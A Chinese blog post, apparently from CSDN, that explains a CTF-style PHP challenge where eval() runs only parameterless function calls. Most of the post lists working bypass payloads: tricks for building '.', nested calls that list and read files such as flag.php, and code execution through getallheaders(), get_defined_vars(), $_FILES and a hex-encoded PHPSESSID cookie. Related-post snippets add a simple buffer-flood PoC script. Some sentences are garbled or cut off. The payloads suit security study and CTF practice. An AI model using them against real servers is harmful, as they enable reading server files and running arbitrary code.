RCE漏洞研究

最新推荐文章于 2025-12-13 11:39:09 发布
原创 最新推荐文章于 2025-12-13 11:39:09 发布 · 621 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android

<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}
?>

代码中:

highlight_file(__FILE__):输出当前文件源码,方便分析。

preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']):匹配并替换掉无参数的函数调用,确保 $_GET['code'] 仅剩 keval($_GET['code']):执行传入的 code 参数。

正则表达式解析:
[^\W]+:匹配字母、数字和下划线,即PHP函数名。

\((?R)?\):匹配函数括号内容,允许递归嵌套。

preg_replace():删除匹配到的函数调用,最终仅剩 ; 时才允许 eval() 执行。

无参数文件读取

1. 获取当前目录下的文件

方法一:使用 localeconv()

current(localeconv());

localeconv() 返回本地货币格式,其中 decimal_point 位置通常是 "."

current() 获取数组的第一个元素,即  "."

方法二:使用 chr(46)

chr(46) 直接返回 '.'

print_r(scandir(chr(46)));

但 chr(46) 依然需要 46 这个数字,我们可以绕过:

chr(time() % 256);  // 只要 time() % 256 在46时,就可以返回 "."
方法三:使用 PHP 版本计算

ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))

该方法基于PHP版本(例如 5.5.9):

floor(phpversion()) → 5

sqrt(5) → 2.236

tan(2.236) → -2.185

cosh(-2.185) → 4.501

sinh(4.501) → 45.081

ceil(45.081) → 46

chr(46) → "."

方法四:使用 crypt() 生成 .

crypt() 可以生成带 . 的哈希:

可以得到

2. 读取当前目录文件

获得目录列表后,我们可以读取文件。假设目标文件是 flag.php,我们需要遍历目录列表并读取它。

方法一:读取最后一个文件

highlight_file(end(scandir(getcwd())));

show_source(end(scandir(getcwd())));

方法二:逆序数组读取

show_source(current(array_reverse(scandir(getcwd()))));

方法三:随机获取文件

show_source(array_rand(array_flip(scandir(getcwd()))));

3. 读取上一级目录文件

方法一:使用 dirname()

print_r(scandir(dirname(getcwd())));

方法二:利用 ".."

next(scandir(getcwd())) 获取 ..

scandir(..) 列出上级目录。

无参数RCE(远程命令执行)

1. 利用 getallheaders()

eval(pos(getallheaders()));

2. 利用 get_defined_vars()

get_defined_vars() 返回所有PHP变量,包括 $_GET$_POST 等:

3. 利用 $_FILES

上传任意文件:因为 $_FILES 在 get_defined_vars() 结果的最后一项,我们用 end() 取出,再 pos(pos()) 获取文件名,最终执行代码。

4. 利用 session_id()
eval(hex2bin(session_id(session_start())));
我们可以通过 Cookie 传入 session_id:

Cookie: PHPSESSID=706870696e666f28293b
hex2bin() 解码成:

phpinfo();
最终 eval() 执行 phpinfo()。

Apparating
关注
YzmCMS 7.0任意函数调用RCE 漏洞研究分析
shelter1234567的博客
05-07 4172
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。YzmCMS某些接口调用了 db_pdo类的where方法 导致了远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
RCE漏洞详解
2402_86373248的博客
05-06 635
定义:远程代码执行(Remote Code Execution,RCE漏洞允许攻击者通过构造恶意输入,在目标服务器或应用程序上执行任意命令或代码。- 危害:可导致服务器完全失陷、数据泄露、内网横向渗透、恶意软件植入等,是最高危的漏洞类型之一。
RCE漏洞基础初了解
m0_68976043的博客
08-12 874
所谓rce简单来说就是可以执行系统命令的函数,举个例子php。
深入探讨RCE漏洞及其防御策略
swordcloud_xm的博客
07-31 1556
借鉴链接当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
Nacos 202407月RCE漏洞(0day)与复现
分享不一样的技术,与你一起共同成长!
07-31 5712
202407月, 爆出漏洞作者说由于某些原因,特意爆出了Nacos的一个RCE 0day漏洞。Nacos 是一个用于动态服务发现和配置以及服务管理的平台,Derby 是一个轻量级的嵌入式数据库。接口 /nacos/v1/cs/ops/derby 和 /nacos/v1/cs/ops/data/removal 在使用 Derby 数据库作为内置数据源时。用于运维人员进行数据运维和问题排查,在使用 standalone 模式启动 Nacos 时,为了避免因搭建外置数据库而占用额外的资源...
Yapi Mock RCE 漏洞复现分析
灰蜗牛
07-12 2754
Yapi Mock RCE 漏洞复现分析 文章目录Yapi Mock RCE 漏洞复现分析0x01 基本信息0x02 漏洞复现0x03 漏洞分析0x04 威胁排查0x05 缓解措施 0x01 基本信息 漏洞名称 : YAPI远程代码执行漏洞 组件名称 : YAPI 影响范围 : YAPI <= 1.9.2, 漏洞类型 :远程代码执行 利用条件 : ​ 1、用户认证:需要用户认证 ​ 2、触发方式:远程 综合评价 : <综合评定利用难度>:中等,需要用户认证。 <综合评定威胁等级&gt
java rce漏洞原理_JXBrowser JavaScript-Java bridge 中的RCE漏洞
weixin_39789206的博客
02-27 317
文章难易度:★★★文章阅读点/知识点:JXBrowserJavaScript-Java bridge 中的RCE漏洞文章作者:WisFree文章来源:blog.portswigger.net【技术分享】JXBrowser JavaScript-Java bridge 中的RCE漏洞1.png (408.46 KB, 下载次数: 13)2016-12-12 15:42 上传前言我近期正在研究如何使用...
浅析xxl-obj分布式任务调度平台RCE漏洞
道阻且长,行则将至
12-29 7188
XXL-JOB 任务调度中心系统这几年被披露出存在多个后台命令执行漏洞,攻击者可以通过反弹 shell 执行任意命令,获取服务器管理权限。本文来分析、总结下 XXL-JOB 系统历史上几个 RCE 漏洞,为攻防工作积累 RCE 高危漏洞知识库。
GitLab 修复严重的RCE漏洞
smellycat000的专栏
07-04 804
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个严重漏洞,可导致攻击者远程执行代码。该漏洞的编号是CVE-2022-2185。该漏洞的等级为“严重”,出现在GitLab的所有版本中:14.10.5之前的14.0版本、15.0.4之前的15.0版本以及15.1.1之前的15.1版本。GitLab 在一份安全公告中指出,认证用户可导入恶意构造的项目...
GitLab修复GitHub import函数中的RCE漏洞
smellycat000的专栏
10-14 568
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士摘要GitLab 中存在一个漏洞,可导致攻击者对GitLab服务器发动多种攻击,包括托管在云上的GitLab.com平台。该漏洞的编号是CVE-2022-2884,CVSS评分为9.9。该漏洞由安全研究员 “yvvdwf” 报告,是因为GitLab 从GitHub 导入数据的方式不正确造成的,可被用于在主机服务器上运行命令。01不安全的impor...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
深入解析RCE漏洞挖掘与利用:涵盖多种技术手段及应用场景.pdf
05-04
适合人群:具备一定安全知识背景的安全研究人员、渗透测试员、网络安全工程师,特别是对RCE漏洞挖掘和利用感兴趣的从业者。 使用场景及目标:①帮助读者理解RCE漏洞的原理及其在不同环境下的利用方式;②提供实际...
20251211给飞凌OK3588-C开发板跑飞凌Android14时让OV5645摄像头以1080p录像
南岭笑笑生之家
12-11 637
本文记录了在飞凌OK3588-C开发板上修改Android14系统配置,使OV5645摄像头支持1080p录像的过程。首先通过source命令初始化编译环境,选择ok3588_c-userdebug构建目标,执行make install clean清理后运行build.sh脚本。关键修改在于media_profiles_V1_0.xml配置文件,将其从默认480p调整为1080p分辨率。操作步骤包括:定位/vendor/etc目录下的配置文件,确认摄像头支持更高分辨率后修改对应参数,最终通过重启验证修改效果
Android FrameWork】第二十八天:Activity 的 UI 绘制全过程
u012739527的博客
12-11 844
Activity → PhoneWindow → DecorView → ContentParent → 开发者布局(如 R.layout.activity_main),形成 “Activity - 窗口 - 根视图 - 自定义布局” 的四层 UI 载体结构,为后续绘制奠定基础。载体初始化:Activity 创建时初始化 PhoneWindow,PhoneWindow 创建 DecorView 并确定 ContentParent。布局加载。
android 为什么revoke权限会杀进程,grant 权限不会杀进程
fuyinghaha的专栏
12-10 53
Android对权限授予和撤销采取不同处理:授予权限时保持进程运行以保障兼容性和用户体验,应用可通过回调处理新权限;而撤销权限时强制终止进程,确保立即切断访问能力,防止数据泄露并重置应用状态。这种差异设计既遵循安全原则,又优化了使用体验,通过实时权限检查、组件生命周期管理等机制实现平衡。
android15 休眠唤醒过程中有时候屏幕显示时间一闪而过
大小白
12-10 339
摘要:针对Android15开发中默认关闭锁屏后休眠唤醒时屏幕闪烁的问题,可通过代码设置默认关闭"收到通知时唤醒屏幕"选项。解决方案是在SettingsApplication.java的onCreate()方法中添加Settings.Secure.putInt(getContentResolver(), DOZE_ENABLED, 0)代码,该设置会禁用屏幕唤醒功能,从而避免闪烁现象。这种方法比手动在设置界面关闭该选项更高效,实现了系统级的默认配置。
3.MySQL 数据库集成
最新发布
m0_71207979的博客
12-13 658
一个库里有多个表,每个表存一类数据(比如 “超市数据” 库里有:✅ 会员表(存会员 ID、姓名、电话);一个 MySQL 里可以建多个 “库”,每个库对应一个业务(比如 “超市数据” 库、“员工考勤” 库),互相隔离;SQL(结构化查询语言)是和 MySQL 对话的 “语言”,你输入指令,MySQL 执行对应的操作(增 / 删 / 改 / 查数据)。为了区分每一行数据,给表指定一个 “唯一标识字段”(比如会员表的 “ID”),保证每行都不一样(不会有两个 ID=1 的张三)。
Qt ---- Qt6.5.3 连接MySQL数据库
m0_72753035的博客
12-13 462
编译文件夹的路径为 : \Qt\6.5.3\Src\qtbase\src\plugins\sqldrivers\build\Desktop_Qt_6_5_3_MinGW_64_bit-Debug\plugins\sqldrivers。将这些文件复制粘贴到 Qt\6.5.3\mingw_64\plugins\sqldrivers 中以及 Qt\Tools\QtCreator\bin\plugins\sqldrivers 中。首先我们需要下载mysql数据库,此文章不展示如何下载mysql数据库。
安卓进阶——原理机制
Meteors.的博客
12-10 294
Android核心机制解析 本文系统梳理了Android开发的四大核心机制: 事件传递机制:详细分析了ViewGroup和View的事件分发流程,包括dispatchTouchEvent、onInterceptTouchEvent等关键方法,并提供了滑动冲突解决方案的实战代码。 View绘制流程:完整解析了measure、layout、draw三大阶段,重点讲解了MeasureSpec机制和性能优化技巧,如避免过度绘制和对象复用。
rce漏洞复现
03-28
### 关于远程代码执行(RCE)漏洞复现的方法 #### 背景介绍 远程代码执行(Remote Code Execution, RCE)是一种高危漏洞,允许攻击者在未授权的情况下,在目标系统的上下文中运行任意代码。这种类型的漏洞通常存在于网络服务、Web 应用程序或其他暴露在网络中的软件中。 #### 复现步骤概述 以下是基于已知案例的通用复现流程: 1. **环境搭建** 需要创建一个模拟真实场景的测试环境来重现漏洞行为。例如,可以使用虚拟机或容器技术隔离实验环境[^4]。 2. **工具准备** 准备必要的开发和调试工具链,包括但不限于 Python 脚本、Metasploit 模块以及其他辅助工具。对于某些特定漏洞,还需要安装对应的依赖库[^1]。 3. **分析漏洞原理** 对具体漏洞的工作机制进行深入研究。比如 CVE-2020-0796 是由于 SMB 协议处理不当引起的 RCE 漏洞,了解其触发条件至关重要[^2]。 4. **编写利用脚本** 根据漏洞特性设计相应的 Payload 或 Exploit 脚本来实现远程代码注入功能。如果存在返回导向编程(ROP),则需额外考虑如何规避 ASLR 和 DEP 等防护措施。 5. **测试与调整** 尝试多次运行编写的 POC (Proof of Concept), 并依据反馈不断优化直至成功达成预期效果为止。 #### 实际案例解析 - PHP 缓冲区溢出漏洞 在一个实际的例子当中提到过有关 iconv() 的调用问题最后却意外发现该缺陷非常适合应用于 PHP 应用层面造成严重的后果[^3]: ```php <?php // 假设这里有一个可控输入参数 $data $data = $_GET['input']; $converted_data = iconv('UTF-8', 'ISO-8859-1//IGNORE', $data); echo $converted_data; ?> ``` 上述代码片段展示了当用户提交的数据长度超过预定义缓冲大小时可能会引发堆栈破坏进而导致不可预测的行为发生。 --- ### 提供一段简单的 IPv6-RCE PoC 示例代码如下所示: ```python import socket def send_payload(ip_address): payload = b"A"*1024 # 构造超长字符串作为载荷尝试覆盖内存区域 try: sckt = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) sckt.connect((ip_address, 80)) sckt.sendall(payload) response = sckt.recv(1024).decode() print(f"Received Response: {response}") except Exception as e: print(e) if __name__ == "__main__": target_ip = "<目标IPv6地址>" send_payload(target_ip) ``` 注意替换 `<目标IPv6地址>` 成真实的 IP 地址前缀后再执行以上脚本。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值